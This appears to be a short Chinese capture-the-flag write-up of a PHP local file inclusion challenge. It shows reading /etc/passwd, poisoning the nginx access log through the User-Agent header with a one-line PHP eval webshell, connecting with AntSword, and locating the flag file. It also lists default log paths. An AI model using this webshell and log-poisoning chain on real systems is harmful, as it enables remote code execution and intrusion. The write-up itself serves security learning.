题目
<?php include($_GET['url']);?>解题流程
- 检查COOKIE,发现没有任何东西
- 尝试
file协议读取/etc/passwd,发现可以利用 - 通过http间谍插件发现中间件为nginx
- 尝试读取nginx日志文件
/var/log/nginx/access.log发现可以读取到内容 - 发现日志文件记录的有
User-Agent的值,可以当做注入点 - 动手!
http间谍
读取日志
通过User-Agent注入
修改User-Agent的值为一句话 <?php eval($_POST[0]);?>
通过AntSword连接
寻找flag
通过图形界面并没有找到flag,于是通过命令行开始查找一下flag文件的位置
find / -name "*flag*"
读取flag
cat /var/www/flag.txt
总结
nginx默认日志文件路径 /var/log/nginx/access.log
apache默认日志文件路径 /var/log/httpd/access_log
apache默认日志文件路径 /var/log/apache2/access.log
本文著作权归作者 [ eson ] 享有,未经作者书面授权,禁止转载,封面图片来源于 [ 互联网 ] ,本文仅供个人学习、研究和欣赏使用。如有异议,请联系博主及时处理。